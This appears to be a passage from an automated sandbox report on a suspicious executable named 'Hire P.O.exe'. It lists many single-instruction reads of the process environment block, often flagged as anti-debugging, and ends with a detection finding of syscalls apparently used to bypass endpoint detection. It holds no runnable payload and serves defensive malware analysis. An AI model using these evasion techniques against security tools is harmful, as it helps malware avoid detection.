                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E27ED mov eax, dword ptr fs:[00000030h]5_2_010E27ED
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114E7E1 mov eax, dword ptr fs:[00000030h]5_2_0114E7E1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C47FB mov eax, dword ptr fs:[00000030h]5_2_010C47FB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C47FB mov eax, dword ptr fs:[00000030h]5_2_010C47FB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01102619 mov eax, dword ptr fs:[00000030h]5_2_01102619
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E609 mov eax, dword ptr fs:[00000030h]5_2_0113E609
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C262C mov eax, dword ptr fs:[00000030h]5_2_010C262C
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DE627 mov eax, dword ptr fs:[00000030h]5_2_010DE627
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F6620 mov eax, dword ptr fs:[00000030h]5_2_010F6620
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F8620 mov eax, dword ptr fs:[00000030h]5_2_010F8620
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DC640 mov eax, dword ptr fs:[00000030h]5_2_010DC640
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA660 mov eax, dword ptr fs:[00000030h]5_2_010FA660
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA660 mov eax, dword ptr fs:[00000030h]5_2_010FA660
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118866E mov eax, dword ptr fs:[00000030h]5_2_0118866E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118866E mov eax, dword ptr fs:[00000030h]5_2_0118866E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F2674 mov eax, dword ptr fs:[00000030h]5_2_010F2674
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C4690 mov eax, dword ptr fs:[00000030h]5_2_010C4690
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C4690 mov eax, dword ptr fs:[00000030h]5_2_010C4690
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FC6A6 mov eax, dword ptr fs:[00000030h]5_2_010FC6A6
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F66B0 mov eax, dword ptr fs:[00000030h]5_2_010F66B0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]5_2_010FA6C7
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA6C7 mov eax, dword ptr fs:[00000030h]5_2_010FA6C7
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E6F2 mov eax, dword ptr fs:[00000030h]5_2_0113E6F2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E6F2 mov eax, dword ptr fs:[00000030h]5_2_0113E6F2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E6F2 mov eax, dword ptr fs:[00000030h]5_2_0113E6F2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E6F2 mov eax, dword ptr fs:[00000030h]5_2_0113E6F2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011406F1 mov eax, dword ptr fs:[00000030h]5_2_011406F1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011406F1 mov eax, dword ptr fs:[00000030h]5_2_011406F1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114C912 mov eax, dword ptr fs:[00000030h]5_2_0114C912
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B8918 mov eax, dword ptr fs:[00000030h]5_2_010B8918
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B8918 mov eax, dword ptr fs:[00000030h]5_2_010B8918
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E908 mov eax, dword ptr fs:[00000030h]5_2_0113E908
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113E908 mov eax, dword ptr fs:[00000030h]5_2_0113E908
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114892A mov eax, dword ptr fs:[00000030h]5_2_0114892A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0115892B mov eax, dword ptr fs:[00000030h]5_2_0115892B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01140946 mov eax, dword ptr fs:[00000030h]5_2_01140946
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114C97C mov eax, dword ptr fs:[00000030h]5_2_0114C97C
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E6962 mov eax, dword ptr fs:[00000030h]5_2_010E6962
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E6962 mov eax, dword ptr fs:[00000030h]5_2_010E6962
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E6962 mov eax, dword ptr fs:[00000030h]5_2_010E6962
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01164978 mov eax, dword ptr fs:[00000030h]5_2_01164978
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01164978 mov eax, dword ptr fs:[00000030h]5_2_01164978
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110096E mov eax, dword ptr fs:[00000030h]5_2_0110096E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110096E mov edx, dword ptr fs:[00000030h]5_2_0110096E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110096E mov eax, dword ptr fs:[00000030h]5_2_0110096E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C09AD mov eax, dword ptr fs:[00000030h]5_2_010C09AD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C09AD mov eax, dword ptr fs:[00000030h]5_2_010C09AD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011489B3 mov esi, dword ptr fs:[00000030h]5_2_011489B3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011489B3 mov eax, dword ptr fs:[00000030h]5_2_011489B3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011489B3 mov eax, dword ptr fs:[00000030h]5_2_011489B3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118A9D3 mov eax, dword ptr fs:[00000030h]5_2_0118A9D3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011569C0 mov eax, dword ptr fs:[00000030h]5_2_011569C0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F49D0 mov eax, dword ptr fs:[00000030h]5_2_010F49D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114E9E0 mov eax, dword ptr fs:[00000030h]5_2_0114E9E0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F29F9 mov eax, dword ptr fs:[00000030h]5_2_010F29F9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F29F9 mov eax, dword ptr fs:[00000030h]5_2_010F29F9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114C810 mov eax, dword ptr fs:[00000030h]5_2_0114C810
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116483A mov eax, dword ptr fs:[00000030h]5_2_0116483A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116483A mov eax, dword ptr fs:[00000030h]5_2_0116483A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov eax, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov eax, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov eax, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov ecx, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov eax, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov eax, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA830 mov eax, dword ptr fs:[00000030h]5_2_010FA830
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D2840 mov ecx, dword ptr fs:[00000030h]5_2_010D2840
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C4859 mov eax, dword ptr fs:[00000030h]5_2_010C4859
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C4859 mov eax, dword ptr fs:[00000030h]5_2_010C4859
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F0854 mov eax, dword ptr fs:[00000030h]5_2_010F0854
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01156870 mov eax, dword ptr fs:[00000030h]5_2_01156870
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01156870 mov eax, dword ptr fs:[00000030h]5_2_01156870
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114E872 mov eax, dword ptr fs:[00000030h]5_2_0114E872
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114E872 mov eax, dword ptr fs:[00000030h]5_2_0114E872
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114C89D mov eax, dword ptr fs:[00000030h]5_2_0114C89D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0887 mov eax, dword ptr fs:[00000030h]5_2_010C0887
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EE8C0 mov eax, dword ptr fs:[00000030h]5_2_010EE8C0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FC8F9 mov eax, dword ptr fs:[00000030h]5_2_010FC8F9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FC8F9 mov eax, dword ptr fs:[00000030h]5_2_010FC8F9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118A8E4 mov eax, dword ptr fs:[00000030h]5_2_0118A8E4
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EEB20 mov eax, dword ptr fs:[00000030h]5_2_010EEB20
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EEB20 mov eax, dword ptr fs:[00000030h]5_2_010EEB20
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01188B28 mov eax, dword ptr fs:[00000030h]5_2_01188B28
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01188B28 mov eax, dword ptr fs:[00000030h]5_2_01188B28
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01168B42 mov eax, dword ptr fs:[00000030h]5_2_01168B42
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01156B40 mov eax, dword ptr fs:[00000030h]5_2_01156B40
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01156B40 mov eax, dword ptr fs:[00000030h]5_2_01156B40
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118AB40 mov eax, dword ptr fs:[00000030h]5_2_0118AB40
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BCB7E mov eax, dword ptr fs:[00000030h]5_2_010BCB7E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0BBE mov eax, dword ptr fs:[00000030h]5_2_010D0BBE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0BBE mov eax, dword ptr fs:[00000030h]5_2_010D0BBE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0BCD mov eax, dword ptr fs:[00000030h]5_2_010C0BCD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0BCD mov eax, dword ptr fs:[00000030h]5_2_010C0BCD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0BCD mov eax, dword ptr fs:[00000030h]5_2_010C0BCD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E0BCB mov eax, dword ptr fs:[00000030h]5_2_010E0BCB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E0BCB mov eax, dword ptr fs:[00000030h]5_2_010E0BCB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E0BCB mov eax, dword ptr fs:[00000030h]5_2_010E0BCB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116EBD0 mov eax, dword ptr fs:[00000030h]5_2_0116EBD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114CBF0 mov eax, dword ptr fs:[00000030h]5_2_0114CBF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EEBFC mov eax, dword ptr fs:[00000030h]5_2_010EEBFC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8BF0 mov eax, dword ptr fs:[00000030h]5_2_010C8BF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8BF0 mov eax, dword ptr fs:[00000030h]5_2_010C8BF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8BF0 mov eax, dword ptr fs:[00000030h]5_2_010C8BF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114CA11 mov eax, dword ptr fs:[00000030h]5_2_0114CA11
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EEA2E mov eax, dword ptr fs:[00000030h]5_2_010EEA2E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCA24 mov eax, dword ptr fs:[00000030h]5_2_010FCA24
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCA38 mov eax, dword ptr fs:[00000030h]5_2_010FCA38
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E4A35 mov eax, dword ptr fs:[00000030h]5_2_010E4A35
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E4A35 mov eax, dword ptr fs:[00000030h]5_2_010E4A35
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0A5B mov eax, dword ptr fs:[00000030h]5_2_010D0A5B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0A5B mov eax, dword ptr fs:[00000030h]5_2_010D0A5B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCA6F mov eax, dword ptr fs:[00000030h]5_2_010FCA6F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCA6F mov eax, dword ptr fs:[00000030h]5_2_010FCA6F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCA6F mov eax, dword ptr fs:[00000030h]5_2_010FCA6F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113CA72 mov eax, dword ptr fs:[00000030h]5_2_0113CA72
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113CA72 mov eax, dword ptr fs:[00000030h]5_2_0113CA72
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01194A80 mov eax, dword ptr fs:[00000030h]5_2_01194A80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F8A90 mov edx, dword ptr fs:[00000030h]5_2_010F8A90
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8AA0 mov eax, dword ptr fs:[00000030h]5_2_010C8AA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8AA0 mov eax, dword ptr fs:[00000030h]5_2_010C8AA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01116AA4 mov eax, dword ptr fs:[00000030h]5_2_01116AA4
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0AD0 mov eax, dword ptr fs:[00000030h]5_2_010C0AD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01116ACC mov eax, dword ptr fs:[00000030h]5_2_01116ACC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01116ACC mov eax, dword ptr fs:[00000030h]5_2_01116ACC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01116ACC mov eax, dword ptr fs:[00000030h]5_2_01116ACC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F4AD0 mov eax, dword ptr fs:[00000030h]5_2_010F4AD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F4AD0 mov eax, dword ptr fs:[00000030h]5_2_010F4AD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FAAEE mov eax, dword ptr fs:[00000030h]5_2_010FAAEE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FAAEE mov eax, dword ptr fs:[00000030h]5_2_010FAAEE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01178D10 mov eax, dword ptr fs:[00000030h]5_2_01178D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01178D10 mov eax, dword ptr fs:[00000030h]5_2_01178D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DAD00 mov eax, dword ptr fs:[00000030h]5_2_010DAD00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DAD00 mov eax, dword ptr fs:[00000030h]5_2_010DAD00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DAD00 mov eax, dword ptr fs:[00000030h]5_2_010DAD00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F4D1D mov eax, dword ptr fs:[00000030h]5_2_010F4D1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B6D10 mov eax, dword ptr fs:[00000030h]5_2_010B6D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B6D10 mov eax, dword ptr fs:[00000030h]5_2_010B6D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B6D10 mov eax, dword ptr fs:[00000030h]5_2_010B6D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01148D20 mov eax, dword ptr fs:[00000030h]5_2_01148D20
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8D59 mov eax, dword ptr fs:[00000030h]5_2_010C8D59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8D59 mov eax, dword ptr fs:[00000030h]5_2_010C8D59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8D59 mov eax, dword ptr fs:[00000030h]5_2_010C8D59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8D59 mov eax, dword ptr fs:[00000030h]5_2_010C8D59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8D59 mov eax, dword ptr fs:[00000030h]5_2_010C8D59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0D59 mov eax, dword ptr fs:[00000030h]5_2_010C0D59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0D59 mov eax, dword ptr fs:[00000030h]5_2_010C0D59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0D59 mov eax, dword ptr fs:[00000030h]5_2_010C0D59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01158D6B mov eax, dword ptr fs:[00000030h]5_2_01158D6B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F6DA0 mov eax, dword ptr fs:[00000030h]5_2_010F6DA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E8DBF mov eax, dword ptr fs:[00000030h]5_2_010E8DBF
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E8DBF mov eax, dword ptr fs:[00000030h]5_2_010E8DBF
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01194DAD mov eax, dword ptr fs:[00000030h]5_2_01194DAD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01188DAE mov eax, dword ptr fs:[00000030h]5_2_01188DAE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01188DAE mov eax, dword ptr fs:[00000030h]5_2_01188DAE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCDB1 mov ecx, dword ptr fs:[00000030h]5_2_010FCDB1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCDB1 mov eax, dword ptr fs:[00000030h]5_2_010FCDB1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCDB1 mov eax, dword ptr fs:[00000030h]5_2_010FCDB1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01144DD7 mov eax, dword ptr fs:[00000030h]5_2_01144DD7
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01144DD7 mov eax, dword ptr fs:[00000030h]5_2_01144DD7
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EEDD3 mov eax, dword ptr fs:[00000030h]5_2_010EEDD3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EEDD3 mov eax, dword ptr fs:[00000030h]5_2_010EEDD3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BCDEA mov eax, dword ptr fs:[00000030h]5_2_010BCDEA
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BCDEA mov eax, dword ptr fs:[00000030h]5_2_010BCDEA
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01160DF0 mov eax, dword ptr fs:[00000030h]5_2_01160DF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01160DF0 mov eax, dword ptr fs:[00000030h]5_2_01160DF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CADE0 mov eax, dword ptr fs:[00000030h]5_2_010CADE0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CADE0 mov eax, dword ptr fs:[00000030h]5_2_010CADE0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CADE0 mov eax, dword ptr fs:[00000030h]5_2_010CADE0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CADE0 mov eax, dword ptr fs:[00000030h]5_2_010CADE0
                Source: C:\Users\user\Desktop\Hire P.O.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
